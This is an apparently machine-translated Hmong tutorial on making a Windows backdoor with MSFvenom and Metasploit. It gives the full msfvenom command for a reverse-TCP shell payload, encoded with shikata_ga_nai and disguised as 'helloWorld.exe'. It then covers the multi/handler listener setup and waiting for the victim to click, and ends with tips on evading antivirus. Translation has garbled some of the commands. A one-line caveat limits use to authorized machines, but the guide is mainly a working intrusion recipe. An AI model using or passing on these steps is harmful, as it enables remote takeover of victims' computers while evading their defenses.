Backdoor yog siv los hla txoj kev ruaj ntseg, feem ntau zais thiab feem ntau tsis tuaj yeem tshawb pom. Siv MSFvenom, ua ke ntawm msfpayload thiab msfencode, nws muaj peev xwm los tsim sab nraum qab uas txuas rov qab rau tus neeg tawm tsam los ntawm kev siv lub plhaub rov qab TCP. Txhawm rau txhawm rau txhim kho sab nraum qab, koj yuav tsum hloov pauv kos npe ntawm koj cov malware kom zam dhau ib qho software tiv thaiv kab mob. Ua kom tiav txoj haujlwm no ntawm ob lub khoos phis tawj uas koj tau tso cai nkag mus, thiab hauv tus txheej txheem, koj yuav kawm paub ntau ntxiv txog kev ruaj ntseg hauv computer thiab yuav ua li cas sab nraum zoov ua haujlwm zoo li no.
Cov kauj ruam
Kauj Ruam 1. Pib Kali thiab tua lub Terminal console
Kauj Ruam 2. Ntaus ifconfig los tso saib lub interface thiab tshawb xyuas koj tus IP chaw nyob
Kauj Ruam 3. Ntaus msfvenom -l encoders los qhia cov npe ntawm cov encoders
Koj yuav siv x86/shikata_ga_nai ua tus encoder
Kauj Ruam 4. Ntaus "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" \0000 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --platform windows xaiv architecture kom siv.
- -p windows/plhaub/reverse_tcp xaiv lub payloads rau embed.
- LHOST xaiv tus mloog IP chaw nyob.
- LPORT xaiv qhov chaw mloog.
- -b "\ x000" xaiv kom zam tus cwj pwm tsis zoo (null bytes).
- -e x86/shikata_ga_nai xaiv lub npe encoders.
- -f exe> helloWorld.exe xaiv cov hom ntawv tso zis.
Kauj Ruam 5. Ntaus msfconsole kom qhib Metasploit
Tam sim no koj tau tsim koj lub nraub qaum. Thaum tus neeg raug tsim txom nyem rau helloWorld.exe, lub plhaub them nyiaj uas tau teeb tsa yuav raug qhib thiab ua kom muaj kev sib txuas rov qab rau koj lub cev. Txhawm rau kom tau txais kev sib txuas, koj yuav tsum qhib ntau tus tuav haujlwm hauv Metasploit thiab teeb tsa cov nyiaj them poob haujlwm
Kauj Ruam 6. Hom siv exploit/multi/handler
Kauj Ruam 7. Ntaus teeb payload windows/plhaub/reverse_tcp
Kauj Ruam 8. Hom kev xaiv los tshuaj xyuas tus qauv
Kauj Ruam 9. Ntaus teeb LHOST 192.168.48.129
"LHOST" xaiv tus IP chaw mloog
Kauj Ruam 10. Hom teeb LPORT 4444
"LPORT" xaiv tus mloog chaw nres nkoj
Kauj Ruam 11. Hom khiav thiab tos rau qhov txuas los ntawm cov neeg raug tsim txom lub tshuab
Kauj Ruam 12. Tos tus neeg raug tsim txom nyem rau helloWorld.exe
Tom qab ntawd koj yuav ua tiav txuas nrog tus neeg raug tsim txom lub tshuab.
Lub tswv yim
- Kev siv -i hauv MSFvenom yuav sawv cev rau qhov rov ua dua ntawm kev nkag. Qee zaum ntau qhov rov ua haujlwm yuav pab kom zam lub software AV.
- Koj tau kawm paub yuav ua li cas thiaj tsim lub backdoor thiab nkag los ntawm kev siv MSFvenom, tab sis txoj hauv kev no yuav tsis ua haujlwm zoo kawg nkaus tiv thaiv qee yam ntawm AV software niaj hnub no. Qhov laj thawj tom qab qhov no yog vim ua tiav cov qauv hauv MSFvenom. Cov neeg muag khoom AV tau ntxiv qhov kos npe zoo li qub ntawm cov qauv no thiab tsuas yog saib rau lawv. Kev daws teeb meem no yog siv cov qauv sib txawv lossis cov cuab yeej sib txawv.